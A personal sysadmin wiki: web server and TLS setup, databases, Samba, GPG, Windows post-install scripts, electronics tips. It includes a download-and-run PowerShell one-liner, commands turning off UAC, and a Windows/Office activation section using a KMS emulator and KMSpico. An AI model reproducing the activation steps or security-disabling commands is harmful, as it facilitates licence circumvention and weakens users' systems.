Tmux is a terminal multiplexer, meaning you can SSH somewhere, run tmux there and disconnect without killing whatever you were running, or just have multiple terminal tabs without actually launching more terminals.

Full cheatsheet: http://hyperpolyglot.org/multiplexers

Tip: tmux running a session but list-sessions doesn't show it? This might help: killall -s SIGUSR1 tmux

If you're running nested tmux sessions, explanation and tips how to do it efficiently. (CTRL+B twice to get into the second level session, thrice to get into third level etc)

Command to detach all other sessions(in case the window is small and other session is blocking resizing): attach -d

Basic usage:

tmux - start new tmux session

tmux ls - list active sessions

tmux a -t sessionName - attach to specific session

tmux kill-session -t sessionName - kill specific session

Inside of tmux:

CTRL+B d - detach session

CTRL+B % - split current pane vertically

CTRL+B " - split current pane horizontally

CTRL+B ARROW_KEY - move between panes

CTRL+B+ARROW_KEY - resize current pane

CTRL+B z - toggle current pane fullscreen state

CTRL+B x - kill current pane

CTRL+B c - create a new window

CTRL+B n - next window

CTRL+B p - previous window

Apache

Packages: apache php php-apache(why?) nghttp2

Sources: Arch wiki

Configuration files are located in the folder /etc/httpd/conf , the main configuration file is httpd.conf

sudo systemctl enable --now httpd - Enable and start the httpd service, you should now be able to access the Apache server via localhost:80

PHP7 >

in httpd.conf

comment out: #LoadModule mpm_event_module modules/mod_mpm_event.so

uncomment: LoadModule mpm_prefork_module modules/mod_mpm_prefork.so

place LoadModule php7_module modules/libphp7.so at the end of the LoadModule list

and Include conf/extra/php7_module.conf at the end of the Include list

sudo systemctl restart httpd

Notes:

DocumentRoot in the config sets the folder for the website, default is /srv/http/

nginx + PHP

Packages: php nginx-mainline php-fpm openssl

systemctl enable --now php-fpm

sudo nano /etc/nginx/nginx.conf - Example config of the server blocks

 server {
        listen       0.0.0.0:80; # listen on IPv4
        listen       [::]:80; # listen on IPv6
        server_name  *.rys.pw rys.pw;
        return 301 https://$host$request_uri; # Redirect all port 80 requests to HTTPS(443)
 }
 server {
         listen       0.0.0.0:443 ssl http2; #listen for TLS IPv4 connections and enable HTTP2
         listen       [::]:443 ssl http2; #listen for TLS IPv6 connections and enable HTTP2
         server_name  rys.pw;
         root /usr/share/webapps/mediawiki;
         index index.php;
         location ~ \.php$ { # serve .php files via php-fpm
                 fastcgi_pass   unix:/run/php-fpm/php-fpm.sock;
                 fastcgi_index  index.php;
                 include        fastcgi.conf;
                 }
         location / {
                 index  index.html index.htm index.php;
                 }

 }
 server { #forward traffic going to proxy.rys.pw to another server - useful if you need more servers running.
          listen       0.0.0.0:443 ssl http2; #listen for TLS IPv4 connections and enable HTTP2
          listen       [::]:443 ssl http2; #listen for TLS IPv6 connections and enable HTTP2
          server_name  proxy.rys.pw;
          location / {
                 proxy_pass         http://10.0.0.10:443/;
                 proxy_redirect     default;
                 proxy_set_header   X-Real-IP  $remote_addr;
                 proxy_set_header   Host       $host;
                 proxy_set_header   X-Forwarded-Proto https;
                 proxy_set_header   X-Forwarded-Ssl on;
         }
 }

You can check if your config is valid via nginx -t, and then reload the server config via nginx -s reload, instead of restarting the daemon.

systemctl enable --now nginx - enable and start nginx

TLS(used to be SSL)

https://cipherli.st/

https://raymii.org/s/tutorials/Strong_SSL_Security_On_nginx.html

https://www.ssllabs.com/ssltest/analyze.html?d=rys.pw

https://securityheaders.io/?q=https%3A%2F%2Frys.pw%2F

https://observatory.mozilla.org/analyze.html?host=rys.pw

TLS 1.0 being deprecated 30th June 2018

All versions of nginx as of 1.4.4 rely on OpenSSL for input parameters to Diffie-Hellman (DH). Unfortunately, this means that Ephemeral Diffie-Hellman (DHE) will use OpenSSL's defaults, which include a 1024-bit key for the key-exchange.

cd /etc/ssl/certs && sudo openssl dhparam -out dhparam.pem 4096 - This takes time depending on your single-core performance as it's not multithreaded (a few mins on i7-4790K, ~42 mins on Raspberry Pi 3B). You can use 2048 but it's weaker; create the stronger file at a later date if you just want to get it running for now.

sudo nano /etc/nginx/nginx.conf - place these outside of the server blocks so it applies to all servers.

Hardening

ssl_dhparam /etc/ssl/certs/dhparam.pem;
ssl_protocols TLSv1.2 TLSv1.3; # Keep in mind this will break software that is way past its end of life.
ssl_prefer_server_ciphers on;
ssl_ciphers "EECDH+AESGCM:EDH+AESGCM:AES256+EECDH:AES256+EDH";
ssl_ecdh_curve secp384r1; # Requires nginx >= 1.1.0
ssl_session_cache shared:SSL:10m;
ssl_session_tickets off; # Requires nginx >= 1.5.9
ssl_stapling on; # Requires nginx >= 1.3.7
ssl_stapling_verify on; # Requires nginx >= 1.3.7
#resolver $DNS-IP-1 $DNS-IP-2 valid=300s; # I do not understand those so I disabled them
#resolver_timeout 5s;
#RESOLVERS: if you don't specify any, nginx will resolve HTTP upstream server hostnames when starting up, and will never attempt to re-resolve them. This is a problem if later the IP addresses of these upstream servers change. But if you define resolvers in nginx.conf, it will honor the TTL of DNS records, and re-resolve the hostnames periodically.
#Make sure you correctly respond to this or the issue is fixed before defining the resolver. http://blog.zorinaq.com/nginx-resolver-vulns/
add_header Strict-Transport-Security "max-age=63072000; includeSubdomains; preload"; # You can add your domain to Chromium's source code for automatic preloading https://hstspreload.org/?domain=rys.pw
add_header X-Frame-Options DENY;
add_header X-Content-Type-Options nosniff;
add_header X-XSS-Protection "1; mode=block";
#add_header Content-Security-Policy "default-src 'self';"; # if you require no scripting.. likely not the case.
add_header Content-Security-Policy "default-src 'self'; script-src 'self'; img-src 'self' data:; style-src 'self' 'unsafe-inline'; font-src 'self' data:; child-src 'self'; connect-src 'self' https://apis.google.com; object-src 'none' ";
# READ THIS - http://lollyrock.com/articles/content-security-policy/

SSL certs - you'll need to use letsencrypt to get these

ssl_certificate /etc/letsencrypt/live/rys.pw/fullchain.pem;
ssl_certificate_key /etc/letsencrypt/live/rys.pw/privkey.pem;

Add a block that redirects all HTTP requests to HTTPS

server {
listen 80;
listen [::]:80;
server_name rys.pw;
return 301 https://$host$request_uri;
}

Additionally use listen 443 ssl http2; listen [::]:443 ssl http2; in every other server block to force TLS and support HTTP2 protocol.

MariaDB

Packages: mariadb

sudo mysql_install_db --user=mysql --basedir=/usr --datadir=/var/lib/mysql

sudo nano /etc/php/php.ini - uncomment extension=mysqli.so

sudo systemctl restart php-fpm

sudo systemctl enable --now mysqld

sudo /usr/bin/mysql_secure_installation

Backup:

mysqldump --single-transaction --flush-logs --master-data=2 --all-databases -u root -p | gzip > all_databases.sql.gz

Restore:

gunzip -c all_databases.sql.gz | mysql -u root -p

Backup with the credentials read from a file instead of typed at the prompt:

mysqldump --defaults-file=/path-to-file/SQLcreds.txt --all-databases > my_db.sql

nano SQLcreds.txt

[mysqldump]
user=mysqluser
password=secret

sudo chown root:root SQLcreds.txt

sudo chmod 600 SQLcreds.txt - only root can read or write it

PhpMyAdmin

Packages: phpmyadmin php-mcrypt

sudo nano /etc/nginx/nginx.conf - add a whole new server block for phpmyadmin

server {
    listen 443 ssl http2;
    listen [::]:443 ssl http2;
    server_name phpmyadmin.localhost;
    root /usr/share/webapps/phpMyAdmin;
    index index.php;
    location ~ \.php$ {
        try_files $uri =404;
        fastcgi_pass unix:/run/php-fpm/php-fpm.sock;
        fastcgi_index index.php;
        include fastcgi.conf;
    }
}

Murmur

Packages: murmur

Port: TCP/UDP 64738

Config: /etc/murmur.ini

Setting valid TLS(SSL) certificate:

uncomment and set these two lines in the config

sslCert=/etc/letsencrypt/live/rys.pw/fullchain.pem
sslKey=/etc/letsencrypt/live/rys.pw/privkey.pem

Let's Encrypt

Packages: certbot certbot-apache/certbot-nginx

https://letsencrypt.org/getting-started/

sudo systemctl stop nginx - Stop your webserver. In case of apache you want to stop httpd

sudo certbot certonly --standalone -d rys.pw -d www.rys.pw -d phpmyadmin.rys.pw -d tickets.rys.pw -d pihole.rys.pw -d mumble.rys.pw -d esp8266.rys.pw -d cloud.rys.pw -d paste.rys.pw --email email@example.com --rsa-key-size 4096 --agree-tos

sudo systemctl start nginx

To non-interactively renew all of your certificates, run certbot renew --rsa-key-size 4096.

Postfix

?Final setup - TODO - postfix+dovecot+roundcube+postfixadmin?

Order of importance of records:

SPF > DKIM > DMARC

https://wiki.archlinux.org/index.php/postfix

Packages: postfix #dovecot roundcubemail postfixadmin php-imap

First set up DNS records. I will be using rys.pw, so I set MX record of @ pointed to rys.pw, which is in turn pointed at my VPS.

systemctl enable --now postfix

echo "Message" | mailx -s "important mail" yourmail@gmail.com - send a test mail; this will likely land in your spam folder.

Edit /etc/postfix/main.cf

myhostname = rys.pw

postfix reload

Now you should be able to resend the test email and see it came from your domain.

Edit /etc/postfix/aliases

root: c0rn3j

change to your user account, reading email as root is bad

postalias /etc/postfix/aliases

For later changes run newaliases

Now you should be able to read mail coming from the internet(only for users that exist on the system) and the services on the box.

less /var/mail/c0rn3j

Access point (WIP)

Packages: hostapd dnsmasq

https://w1.fi/cgit/hostap/plain/hostapd/hostapd.conf

https://wiki.gentoo.org/wiki/Hostapd

https://frillip.com/using-your-raspberry-pi-3-as-a-wifi-access-point-with-hostapd/

sudo nano /etc/hostapd/hostapd.conf

# hostapd does not support trailing comments, everything after = becomes the value, so comments get their own lines
# SSID of the network
ssid=myWifi
# password for the network
wpa_passphrase=MySuperSecurewifi123
# Interface it'll run on
interface=wlan0
# 1=Open System authentication (used with WPA/WPA2), 2=Shared Key (WEP), 3=both
auth_algs=1
# Channel it'll broadcast on
channel=6
driver=nl80211
# 2.4GHz, 'a' for 5GHz
hw_mode=g
rsn_pairwise=CCMP
# WPA2 only
wpa=2
wpa_key_mgmt=WPA-PSK
# In addition to these, RPi3 seems to require those
# nothing would work without this
ieee80211n=1
# QoS support
#wmm_enabled=1
# I did not actually need this
#ht_capab=[HT40][SHORT-GI-20][DSSS_CCK-40]

sudo nano /etc/sysctl.conf # is this an outdated way to set ipv4 forward on a systemd distro?

net.ipv4.ip_forward = 1

sudo sysctl -p

sudo iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

sudo iptables -A FORWARD -i eth0 -o wlan0 -m state --state RELATED,ESTABLISHED -j ACCEPT

sudo iptables -A FORWARD -i wlan0 -o eth0 -j ACCEPT

sudo sh -c "iptables-save > /etc/iptables.rules"

sudo iptables-restore /etc/iptables.rules # This needs to be executed after boot

sudo nano /etc/dnsmasq.conf

port = 0

sudo ip addr add 192.168.2.1/24 broadcast 192.168.2.255 dev wlan0

sudo ip route add default via 192.168.0.1

Samba(file sharing)

https://wiki.archlinux.org/index.php/samba

Packages: samba

sudo cp /etc/samba/smb.conf.default /etc/samba/smb.conf - copy the default config file to the default config path

sudo systemctl enable --now smb

sudo nano /etc/samba/smb.conf

workgroup = WORKGROUP - change to WORKGROUP so it's the same as the default Windows workgroup.

valid users = %S - add this to [homes] to allow users to log in to their home directories(?)

Example block

[dolphin]
comment = dolphin ISOs
# Samba doesn't need escape sequences for spaces and such. Comments go on their own line, smb.conf has no trailing comments.
path = /mnt/3tbRED/DOLPHIN ISOs
read only = yes
valid users = c0rn3j

Samba requires a Linux user account - you may use an existing user account or create a new one. Although the user name is shared with the Linux system, Samba uses a password separate from that of the Linux user accounts.

sudo smbpasswd -a c0rn3j - add the user to Samba and set their Samba password

testparm -s - will show you the current config

sudo smbstatus - list connections to the shares on the server

sudo systemctl restart smb - restart samba service to apply new config

Now on the client side...

smbclient -L //192.168.1.10 -U% - list public shares on a server

sudo mount //192.168.1.10/homes /mnt/dolphin/ -o user=c0rn3j - example: Mount the home of user c0rn3j to /mnt/dolphin/

Mounting every time is tedious though, let's add an entry to fstab to mount it on boot. First we'll need to store the credentials safely though.

sudo nano /mnt/credentials

username=c0rn3j
password=supersafepassword

sudo chmod 600 /mnt/credentials - secure it so it's not readable by anyone but root or owner.

sudo nano /etc/fstab - and add this line at the bottom

//192.168.1.10/dolphin /mnt/dolphin cifs auto,x-systemd.automount,_netdev,credentials=/mnt/credentials 0 0

mount -v - list all mountpoints

mount -t cifs - list mountpoints by fs

GPG Encryption

-c specifies to encrypt symmetrically(symmetrical is harder to crack than asymmetrical), defaults to AES-128 which should be secure enough for now and the near future. AES-256 seems to be noted as 30-40% slower, so if you don't mind taking that performance hit feel free to use that instead(but I do suggest reading why you'd want to do that first as AES-128 is possibly enough for you).

Encryption with a password and AES-256:

gpg --batch --cipher-algo AES256 --passphrase password -c file

Decryption with a password:

gpg --batch --passphrase password -o file -d file.gpg

If you are not going to be using an automatic script for encryption/decryption, you can simply omit --passphrase password and you will be asked to enter it manually.

The above example is not secure because any user can execute ps aux and see the whole command, including the password.
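The exposure described above can be reproduced without a real secret. This added example (not from the original wiki) starts a harmless stand-in process carrying gpg's arguments and reads back its argument list, once with --passphrase and once with --passphrase-file; the gpg-standin name and the helper functions are assumptions made for the illustration.

```sh
#!/bin/sh
# Added example: a passphrase passed as a command-line argument is readable
# from the process list, one read from a file is not.
# Only processes started by this script are inspected.

# Print the argument list of PID the way `ps aux` shows it.
argv_of() {
    if [ -r "/proc/$1/cmdline" ]; then
        tr '\000' ' ' < "/proc/$1/cmdline"
    else
        ps -o args= -p "$1"
    fi
}

# Wait (about 3 s at most) until MARKER shows up in the argv of PID, i.e.
# until the freshly forked child has exec'd the stand-in command.
wait_for_marker() {
    tries=0
    while [ "$tries" -lt 30 ]; do
        case "$(argv_of "$1" 2>/dev/null)" in
            *"$2"*) return 0 ;;
        esac
        tries=$((tries + 1))
        sleep 0.1 2>/dev/null || sleep 1
    done
    return 1
}

# Return 0 if SECRET can be read from the argv of PID, 1 otherwise.
secret_in_argv() {
    case "$(argv_of "$1" 2>/dev/null)" in
        *"$2"*) return 0 ;;
        *) return 1 ;;
    esac
}

stop_standin() {
    kill "$1" 2>/dev/null || :
    wait "$1" 2>/dev/null || :
}

# Stand-in for `gpg --batch --passphrase SECRET -c file`: a shell that only
# sleeps, started with the same arguments (the name is hypothetical).
# Returns 0 if the secret is visible, 1 if not, 2 if the stand-in never started.
leak_via_argument() {
    name="gpg-standin-$$"
    sh -c 'sleep 3; :' "$name" --batch --passphrase "$1" -c file \
        </dev/null >/dev/null 2>&1 &
    pid=$!
    wait_for_marker "$pid" "$name" || { stop_standin "$pid"; return 2; }
    rc=0
    secret_in_argv "$pid" "$1" || rc=$?
    stop_standin "$pid"
    return "$rc"
}

# Stand-in for `gpg --batch --passphrase-file FILE -c file`: the secret sits
# in a mode-600 file and only the path of that file appears in argv.
leak_via_file() {
    name="gpg-standin-$$"
    passfile=$(mktemp) || return 2
    chmod 600 "$passfile"
    printf '%s\n' "$1" > "$passfile"
    sh -c 'sleep 3; :' "$name" --batch --passphrase-file "$passfile" -c file \
        </dev/null >/dev/null 2>&1 &
    pid=$!
    wait_for_marker "$pid" "$name" || { stop_standin "$pid"; rm -f "$passfile"; return 2; }
    rc=0
    secret_in_argv "$pid" "$1" || rc=$?
    stop_standin "$pid"
    rm -f "$passfile"
    return "$rc"
}

# Constructed sample secret, not a real credential.
SAMPLE='constructed-passphrase-123'
if leak_via_argument "$SAMPLE"; then
    echo "--passphrase: secret is visible in the process list"
fi
if leak_via_file "$SAMPLE"; then
    echo "--passphrase-file: secret is visible in the process list"
else
    echo "--passphrase-file: only the file path is visible"
fi
```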

Now let's do it better!

nano password.txt - write your super secret password there

sudo chown root:root password.txt

sudo chmod 600 password.txt - only root can read or write it

Encryption with a password in a restricted file:

sudo gpg --batch --passphrase-file password.txt -c file

Decryption with a password in a restricted file:

sudo gpg --batch --passphrase-file password.txt -o file -d file.gpg
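The credential files used on this page (SQLcreds.txt for mysqldump, /mnt/credentials for the CIFS mount and password.txt for gpg) are protected only by their owner and mode. The check below is an added example, not part of the original wiki; the function names and exit codes are assumptions made for the illustration, and the sample files are constructed.

```sh
#!/bin/sh
# Added example: check that a file holding a password is a regular file,
# owned by the expected user, and closed to group and others.
#
# check_secret_file PATH [UID]
#   0  private and not executable (600 or 400)
#   1  group or others have some access (e.g. 644, 640)
#   2  missing, a symlink, or not a regular file
#   3  private, but carries an execute bit it does not need (e.g. 700)
#   4  owned by a different user than UID

# Octal permission bits and numeric owner (GNU stat, BSD stat as fallback).
file_mode()  { stat -c '%a' "$1" 2>/dev/null || stat -f '%Lp' "$1"; }
file_owner() { stat -c '%u' "$1" 2>/dev/null || stat -f '%u' "$1"; }

check_secret_file() {
    path=$1
    want_uid=${2:-}
    # A symlink could point the reader at a file somebody else controls.
    if [ -L "$path" ] || [ ! -f "$path" ]; then
        echo "$path: not a regular file"
        return 2
    fi
    mode=$(file_mode "$path") || return 2
    bits=$((0$mode))            # read the mode string as an octal number
    if [ -n "$want_uid" ] && [ "$(file_owner "$path")" != "$want_uid" ]; then
        echo "$path: owner is not uid $want_uid"
        return 4
    fi
    if [ $((bits & 077)) -ne 0 ]; then
        echo "$path: mode $mode lets group or others in"
        return 1
    fi
    if [ $((bits & 0111)) -ne 0 ]; then
        echo "$path: mode $mode is private but executable"
        return 3
    fi
    echo "$path: mode $mode ok"
    return 0
}

# Constructed sample files standing in for the credential files above.
demo_dir=$(mktemp -d) || exit 1
for m in 600 700 644; do
    printf 'password=constructed-example\n' > "$demo_dir/creds-$m"
    chmod "$m" "$demo_dir/creds-$m"
    check_secret_file "$demo_dir/creds-$m" "$(id -u)" || :
done
check_secret_file "$demo_dir/does-not-exist" || :
rm -rf "$demo_dir"
```

For the root-owned files on this page the call would be check_secret_file /mnt/credentials 0.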

LUKS

Check if your password is correct and list slots:

cryptsetup luksOpen --test-passphrase --verbose /dev/sda

Add a key file for automatic unlocking via /etc/crypttab:

cryptsetup luksAddKey /dev/nvme1n1p1 /etc/adatapass

Ansible

Encrypt a file:

ansible-vault encrypt --vault-id C0rn3j/configs@~/C0rn3j_configs-vaultpass.txt id_ed25519

Encrypt a string for use in playbooks/templates:

ansible-vault encrypt_string --vault-id C0rn3j/configs@~/C0rn3j_configs-vaultpass.txt 'supersecretpassword' --name 'bree_matomo_db_password'

webOS

Since there's 2 LG TVs in the household, I figured I might as well make a separate page for them.

  1. 55UH605V-ZC - 3.10.19-p.45.dharug.k2lp.2 - FW 05.30.60 - webOS 3.3.4
  2. 55UK6200PLA - 4.4.84-p.84.gomolsha.lm18a.1 - FW 05.20.15 - webOS 4.2.0

There's some ways to jailbreak some LG TVs - XDA, RU forum

You can get SSH access by following instructions here.

cat /var/run/nyx/device_info.json - has mac addresses and TV model name among other things

cat /var/run/nyx/os_info.json - webOS version. The version the TV displays is FW version, not webOS version!

Encode this as Base64 into a file called 'query' and execute the curl command to test the connection to the update server

<REQUEST>
<PRODUCT_NM>webOSTV 4.0</PRODUCT_NM>
<MODEL_NM>HE_DTV_W18A_AFADABAA</MODEL_NM>
<SW_TYPE>FIRMWARE</SW_TYPE>
<MAJOR_VER>04</MAJOR_VER>
<MINOR_VER>10.45</MINOR_VER>
<COUNTRY>GB</COUNTRY>
<COUNTRY_GROUP>EU</COUNTRY_GROUP>
<DEVICE_ID>20:17:42:14:b7:43</DEVICE_ID>
<AUTH_FLAG>N</AUTH_FLAG>
<IGNORE_DISABLE>N</IGNORE_DISABLE>
<ECO_INFO>01</ECO_INFO>
<CONFIG_KEY>00</CONFIG_KEY>
<LANGUAGE_CODE>en-GB</LANGUAGE_CODE></REQUEST>
curl -X POST -A "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" -d @query http://snu.lge.com/CheckSWAutoUpdate.laf

If query is wrong, server cuts connection - curl: (56) Recv failure: Connection reset by peer

Server also times out very often.

Queries and responses are Base64 encoded.

Windows

Powershell setup scripts

Post-install script

# W10 21H1
# Take Cortana off the taskbar
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowCortanaButton /t REG_DWORD /d 0 /f
# Hide People button
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\People /v PeopleBand /t REG_DWORD /d 0 /f
# Delete Windows Defender tray from startup
reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v SecurityHealth /f
# Disable Skype from startup
reg add "HKCU\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.SkypeApp_kzf8qxf38zg5c\SkypeStartup" /v State /t REG_DWORD /d 0 /f
# Do not hide tray items when they get cluttered
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer /v EnableAutoTray /t REG_DWORD /d 0 /f

# W11 21H2
# Disable Teams+Edge from autostartup
# TODO
# Disable Widgets icon from Taskbar
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v TaskbarDa /t REG_DWORD /d 0 /f
# Disable Chat icon from Taskbar
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v TaskbarMn /t REG_DWORD /d 0 /f
# Align Taskbar to the left
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v TaskbarAl /t REG_DWORD /d 0 /f

# W11 21H2 + W10 21H1
# Enable Hyper-V on Pro or Edu
Enable-WindowsOptionalFeature -Online -FeatureName Microsoft-Hyper-V -All -NoReboot
# Disable Automatic Install of Suggested Apps 
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager /v SilentInstalledAppsEnabled /t REG_DWORD /d 0 /f
# Disable App Suggestions in Start menu
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager /v SystemPaneSuggestionsEnabled /t REG_DWORD /d 0 /f
# Disable popup "tips" about Windows
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager /v SoftLandingEnabled /t REG_DWORD /d 0 /f
# Disable Windows Welcome Experience
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\ContentDeliveryManager /v SubscribedContent-310093Enabled /t REG_DWORD /d 0 /f
# Disable xbox game DVR capture
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\GameDVR /v AppCaptureEnabled /t REG_DWORD /d 0 /f
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\GameDVR /v HistoricalCaptureEnabled /t REG_DWORD /d 0 /f
# Show file extensions
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v HideFileExt /t REG_DWORD /d 0 /f
# Opening explorer opens in THIS PC rather than RECENT FILES
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v LaunchTo /t REG_DWORD /d 1 /f
# Take Search off the taskbar
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Search /v SearchboxTaskbarMode /t REG_DWORD /d 0 /f
# Hide Task View button
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowTaskViewButton /t REG_DWORD /d 0 /f
# Show hidden files
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v Hidden /t REG_DWORD /d 1 /f
# Show hidden system files
#reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /v ShowSuperHidden /t REG_DWORD /d 1 /f
# Disable lock screen window when using password, saving one extra click
reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Personalization /v NoLockScreen /t REG_DWORD /d 1 /f
# Enable Dark Mode for apps
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize /v AppsUseLightTheme /t REG_DWORD /d 0 /f
# Enable Dark Mode for system
reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Themes\Personalize /v SystemUsesLightTheme /t REG_DWORD /d 0 /f
# Disable UAC prompts (EnableLUA=0 turns UAC off entirely, applies after a reboot)
reg add HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
# Delete OneDrive from startup
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v OneDrive /f
# Delete all taskbar shortcuts to get rid of Edge, Store and more
reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Taskband /v Favorites /f
# Disable hibernation to get rid of hiberfile.sys
#powercfg.exe -h off
# Kill and restart explorer.exe to apply most changes right now
taskkill /f /im explorer.exe
explorer.exe
# https://chocolatey.org/install
Set-ExecutionPolicy Bypass -Scope Process -Force; [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.ServicePointManager]::SecurityProtocol -bor 3072; iex ((New-Object System.Net.WebClient).DownloadString('https://chocolatey.org/install.ps1'))

# Reopen powershell

# Minimal install
choco install -y googlechrome notepadplusplus 7zip windirstat everything smplayer libreoffice-fresh nomacs ventoy
# Bloat
#choco install -y mumble googlechrome notepadplusplus 7zip crystaldiskmark crystaldiskinfo keepassxc sharex openssh telegram windirstat openjdk8 everything teamviewer smplayer libreoffice-fresh nomacs hwinfo qbittorrent ventoy

Activate Windows

First install vlmcsd and OpenVPN's tap driver for a 10.10.10.10 tunnel, as Windows will refuse to authenticate against a KMS server running on localhost

choco install -y tapwindows
# https://github.com/Wind4/vlmcsd/releases/latest
# Download the vlmcsd binaries archive and extract binaries/binaries/Windows/intel/vlmcsd-Windows-x64.exe to C:\install\vlmcsd.exe
New-Item -ItemType Directory -Force -Path C:\install
Invoke-WebRequest -Uri https://cloud.rys.pw/s/H3WeZ37ntKxGZ2s/download -OutFile C:\install\vlmcsd.exe
# Install the service
C:\install\vlmcsd.exe -s -U /n -O .
netsh advfirewall firewall add rule name="vlmcsd" dir=in action=allow program=C:\install\vlmcsd.exe enable=yes
# Start the service (it's enabled, reboot would also start it)
net start vlmcsd
# https://docs.microsoft.com/en-us/windows-server/get-started/kmsclientkeys
# https://docs.microsoft.com/en-us/windows/deployment/upgrade/windows-10-edition-upgrades#upgrade-using-a-command-line-tool
# If you do not have Home(Core) installed, you can switch between different editions (not Home)
# You can get a popup with available editions via 'slmgr /dlv all'. 
# Get just the editions by copypasting the box and running 'grep Name boxtext.txt | sort | uniq'
# Note: Windows 11 KMS keys seem to match W10 ones

# Switch edition to Edu
Cscript.exe c:\windows\system32\slmgr.vbs /ipk NW6C2-QMPVW-D7KKK-3GKT6-VCFB2

# W11 Edu 
slmgr /ipk NW6C2-QMPVW-D7KKK-3GKT6-VCFB2
# Set KMS server to a LAN one
#slmgr /skms 192.168.1.40:1688
slmgr /skms 10.10.10.10:1688
# Force activation now
slmgr /ato
# You should get a box in a few seconds that the activation passed. You can see the license info with
slmgr /dli

Activate Office

# https://docs.microsoft.com/en-us/deployoffice/vlactivation/gvlks
cd 'C:\Program Files\Microsoft Office\Office16'
# Office 2019 Pro Plus
#cscript ospp.vbs /inpkey:NMMKJ-6RK4F-KMJVX-8D9MJ-6MWKP
# Office 2021 Pro Plus
cscript ospp.vbs /inpkey:FXYTK-NJJ8C-GB6DW-3DYQT-6F7TH
cscript ospp.vbs /sethst:10.10.10.10
cscript ospp.vbs /act

Download

You can download .ISO of Windows 10 or Windows 11 versions directly from Microsoft's servers. Note that you'll have to spoof the user agent if you're on Windows, as you'll get redirected to the Media creator tool otherwise.

The ISOs provided by MS contain all the editions (sans enterprise pretty much), but you might have to add.../sources/ei.cfg file to show them all.

You can download older versions of windows and different versions of W10 through this method

If you want Enterprise, one way to get it is to install Pro/Edu and then switch the license, as per the powershell example above.

Reboot into UEFI

Open admin cmd.exe and run: shutdown /r /fw /t 0

Windows 11 Installation

Boot from the flash drive. Remember to always select "Custom" where applicable. You can skip creating a Microsoft account by trying to login with a nonexistent email.

Windows usually gets all the drivers itself, but if something doesn't work as it should you might need to visit your motherboard or device manufacturer's website and download drivers/update firmware.

Windows usually downloads an outdated GPU driver so head over to AMD's or Nvidia's website depending on what GPU you have.

If you already have or had a Windows license, then your hardware ID combination(should be motherboard+CPU) is stored on Microsoft's servers and your license will be obtained automatically when you connect to the internet, provided you installed the same Windows version.

If you don't have a W11 license you can either:

  1. Buy a license key from official source. Buying from unofficial sources/grey markets is exactly as illegal as cracking it. You'd be literally giving your money away to thieves. The keys are from hacked MSDN accounts, credit card frauds etc.

  2. If you're in college or some sort of academic institute, they might have MSDN licenses, see if you can find a copy from their IT department.

  3. Not activate Windows - you will not be able to use Personalization features and it'll nag you

  4. Activate Windows with KMSpico. Defender will complain about it, allow it manually in Defender after installing it. Alternatively you can use vlmcsd if you want an open source, more hardcore solution.

eGovernment

Since I was forced to make an eIdentity with my government, mostly due to new laws about customs, I noted down everything needed from the view of someone who had absolutely no eGovernment account before.

Login:

Why:

Electronics

Current is a gateway drug to magic smoke.

A list of basic stuff to buy when starting out

Soldering

You might've noticed that some things are super easy to solder, some are super hard.

That's because you may be using a ruined tip(it's supposed to be shiny, not black), low-power iron or solder without lead(Pb). The last possible annoying cause is that the contacts you are soldering on are lead-free. For those I've had to use minimum 370°C and half of the connections I made were garbage.

How to not ruin a tip

Do not leave the iron on when you are not using it.

Clean the tip by applying solder, wiping it clean on a sponge or steel wool and then coat it with a thin layer of solder to prevent oxidation before you turn it off and leave it, or coat it right after turning it off.

If you use a sponge, make sure it's damp but not soaked.

Components

Wires

http://www.powerstream.com/Wire_Size.htm

LED strips

LED strips from "best" to "worst". Price is according to that.

SK9822 =~ APA102 > APA102C > WS2812B

Capacitors

If you overvolt a capacitor it will fail in moments; if you go above 50-70% of the voltage limit it will fail in months, or years. All electrolytic caps will fail eventually though, even if idle.

Resistors

https://learn.sparkfun.com/tutorials/resistors

Batteries

Alkaline typically doesn't have a mAh rating because it's so current dependent

AA, AAA

To measure voltage just put the multimeter into voltage mode and connect the leads to the positive and negative of the battery. If the battery is non-rechargeable and way below its supposed voltage (think <1V for a 1.5V battery) it's pretty much dead.

Laws and equations

Ohm's law

The law stating that the direct current flowing in a conductor is directly proportional to the potential difference between its ends. It is usually formulated as V = IR, where V is the potential difference, or voltage, I is the current, and R is the resistance of the conductor.

To explain that in a more useful way - You can calculate for a third variable if you know the other two.

